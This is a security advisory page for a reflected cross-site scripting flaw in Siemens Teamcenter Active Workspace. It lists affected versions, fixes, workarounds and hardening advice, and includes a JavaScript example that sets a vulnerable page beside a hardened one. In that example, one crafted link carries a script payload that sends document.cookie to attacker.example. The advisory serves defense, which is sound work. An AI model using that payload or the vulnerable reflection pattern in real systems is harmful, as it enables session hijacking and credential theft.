Siemens Teamcenter Active Workspace
Monitor · CVSS 6.1 · ICS-CERT ICSA-22-167-15 · Jun 14, 2022
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: Required
Summary
Teamcenter Active Workspace V5.2 (all versions before 5.2.9) and V6.0 (all versions before 6.0.3) contain a cross-site scripting (XSS) vulnerability reachable through a crafted link. An attacker who gets an authenticated user to open such a link can run script in that user's browser session under the application's origin. The victim must act (open the link); the script can then hijack the session or harvest credentials entered into the application.
What this means
What could happen
A remote attacker could inject malicious scripts into Teamcenter Active Workspace to steal user session data or credentials when an authorized user views a crafted link, compromising access to the product lifecycle management system.
Who's at risk
Engineering and design organizations using Siemens Teamcenter Active Workspace for product lifecycle management. This includes automotive, manufacturing, aerospace, and industrial equipment design teams who rely on the application for collaborative product data and design workflows.
How it could be exploited
An attacker crafts a URL to the application that carries a JavaScript payload and delivers it to an authorized Teamcenter user by email, chat, or other social engineering. When the user opens the link, the application reflects the payload into the page and the script executes under the application's origin in the user's session. From there it can read any session identifier exposed to script, issue requests to Teamcenter as the victim even if the session cookie is HttpOnly, or present a fake login prompt to harvest credentials.
Prerequisites
- User must be authenticated to Teamcenter Active Workspace
- User must click a malicious link crafted by the attacker
- No browser-side control can be relied on to block the payload: current Chrome and Edge have removed their legacy XSS filter and Firefox never shipped one, so the victim's browser will render whatever the application reflects
Tags: remotely exploitable · requires user interaction · low complexity · affects PLM system access control
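The pattern described above, as an added illustration that is not Siemens code and does not use the real Active Workspace injection point (this page does not identify it): a page that reflects a query parameter into HTML verbatim, the same page with output encoding, and the response headers that blunt the impact if an encoding gap is missed. The `/awc/search` path, the `q` parameter, the cookie name and the host names are hypothetical placeholders.

```javascript
// Added example (not Siemens code): a reflected-XSS pattern of the kind the
// advisory describes, beside its hardened form. The "/awc/search" endpoint,
// the "q" parameter and the host names are hypothetical placeholders; the
// real Active Workspace injection point is not identified on this page.

// Contextual output encoding for text placed in an element body or a
// double-quoted attribute. This is what keeps attacker-controlled text
// from being parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Read a query parameter from a link the way the server will receive it
// from the browser: percent-decoded.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) ?? '';
}

// Vulnerable: the search term is reflected into the response verbatim.
function renderSearchPageVulnerable(q) {
  return `<h2>Results for: ${q}</h2>`;
}

// Hardened: identical page, but the untrusted value is encoded on output.
function renderSearchPageHardened(q) {
  return `<h2>Results for: ${escapeHtml(q)}</h2>`;
}

// Defense in depth for when an encoding gap is missed somewhere: a CSP that
// refuses inline script, and a session cookie that page script cannot read.
// Cookie name and CSP values are illustrative, not Teamcenter's settings.
function defenseInDepthHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'self'",
    'Set-Cookie': 'SESSION=<opaque>; Path=/; Secure; HttpOnly; SameSite=Lax',
  };
}

// Constructed crafted link of the kind the attacker would send to a user.
const CRAFTED_LINK =
  'https://plm.example.internal/awc/search?q=' +
  encodeURIComponent('<script>fetch("https://attacker.example/?" + document.cookie)</script>');

// Render both variants for the crafted link's payload.
function demo() {
  const q = queryParam(CRAFTED_LINK, 'q');
  return {
    payload: q,
    vulnerable: renderSearchPageVulnerable(q),
    hardened: renderSearchPageHardened(q),
    headers: defenseInDepthHeaders(),
  };
}

console.log(demo());
```

The vulnerable variant returns the payload as live markup; the hardened one returns the same characters as entities, so the browser displays them as text. The CSP and HttpOnly cookie do not fix the bug, they only limit what an injected script can do, which is why the hotfix still has to be applied.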
Exploitability
Low exploit probability (EPSS 0.5%)
Affected products (2), 2 with fix
Product | Affected Versions | Fix Status
Teamcenter Active Workspace V5.2 | < V5.2.9 | Fixed in V5.2.9
Teamcenter Active Workspace V6.0 | < V6.0.3 | Fixed in V6.0.3
Remediation & Mitigation
Do now
WORKAROUND: Browser-side XSS filtering is not a dependable control and should not be relied on: current Chrome and Edge have removed their XSS filter and Firefox never shipped one. Until the hotfix is applied, warn Active Workspace users not to open links to the application that arrive by email or chat, and, where the deployment's web tier allows it, send the session cookie with the HttpOnly attribute so an injected script cannot read it directly.
Schedule — requires maintenance window
Applying the hotfix may require restarting the Active Workspace application server; plan for a service interruption to users.
Teamcenter Active Workspace V5.2
HOTFIX: Update Teamcenter Active Workspace V5.2 to version 5.2.9 or later
Teamcenter Active Workspace V6.0
HOTFIX: Update Teamcenter Active Workspace V6.0 to version 6.0.3 or later
Long-term hardening
HARDENING: Restrict network access to Teamcenter Active Workspace using firewall rules, allowing connections only from approved engineering and design workstations. This limits who can reach the application, including its login page and the reflecting endpoint, but it does not stop this XSS: the script runs in the browser of an authorized user on an approved workstation. Treat it as reducing exposure, not as a substitute for the hotfix.
CVEs (1)